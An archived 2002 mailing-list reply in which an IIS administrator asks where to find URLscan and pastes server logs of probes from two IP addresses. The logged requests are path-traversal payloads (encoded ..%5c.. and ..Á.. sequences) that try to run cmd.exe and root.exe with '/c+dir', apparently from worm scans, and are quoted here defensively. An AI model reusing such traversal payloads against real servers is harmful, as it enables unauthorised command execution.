Re: Is someone trying to hack my IIS server?

From: Lars Brandt (brandt@ancro.se)
Date: 05/13/02

• Next message: Keith W. McCammon: "Re: Ping resonse?"
• Previous message: Thomas Bakeberg: "generate Client-side Certificates and send them per mail"
• In reply to: David Dickinson [MVP]: "Re: Is someone trying to hack my IIS server?"
• Next in thread: Lisa Cozzens: "Re: Is someone trying to hack my IIS server?"
• Reply: Lisa Cozzens: "Re: Is someone trying to hack my IIS server?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: Lars Brandt <brandt@ancro.se>
Date: Mon, 13 May 2002 13:53:43 +0200

Hi,

I have closed down port 80 for some time now since we where so badly flooded
with CodeRed (I have the patch!) but thought it had cooled down
now...Obviously also that is still going on...

Now I needed to open it up just to get traffic redirected to another site...

I just wanted to check with the group where I could find that URLscan tool
that David Dickinson mentioned in a posting some time ago ?

I have also appended my logs below where you can see that someone is trying to
get in. I do not know if they succeed however. Anyone can know this ??

Lars

2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /scripts/root.exe /c+dir
302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /MSADC/root.exe /c+dir 302
-
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /c/winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET /d/winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:44 194.129.153.20 - "myip" 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET /winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 01:59:45 194.129.153.20 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 194.129.153.20 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 194.129.153.20 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 01:59:46 194.129.153.20 - "myip" 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /scripts/root.exe /c+dir
302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /MSADC/root.exe /c+dir 302
-
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /c/winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /d/winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:25 194.136.202.131 - "myip" 80 GET /winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET /winnt/system32/cmd.exe
/c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 302 -
2002-05-04 11:11:26 194.136.202.131 - "myip" 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 302 -

David Dickinson [MVP] wrote:

> bubbapcguy wrote:
> > Install the urlscan also and you will reject those scans
> > Bubba
>
> I think he did, which is why those requests are returning 404. URLscan is
> bundled with the IISLockdown tool.
>
> David

---

• Next message: Keith W. McCammon: "Re: Ping resonse?"
• Previous message: Thomas Bakeberg: "generate Client-side Certificates and send them per mail"
• In reply to: David Dickinson [MVP]: "Re: Is someone trying to hack my IIS server?"
• Next in thread: Lisa Cozzens: "Re: Is someone trying to hack my IIS server?"
• Reply: Lisa Cozzens: "Re: Is someone trying to hack my IIS server?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(12)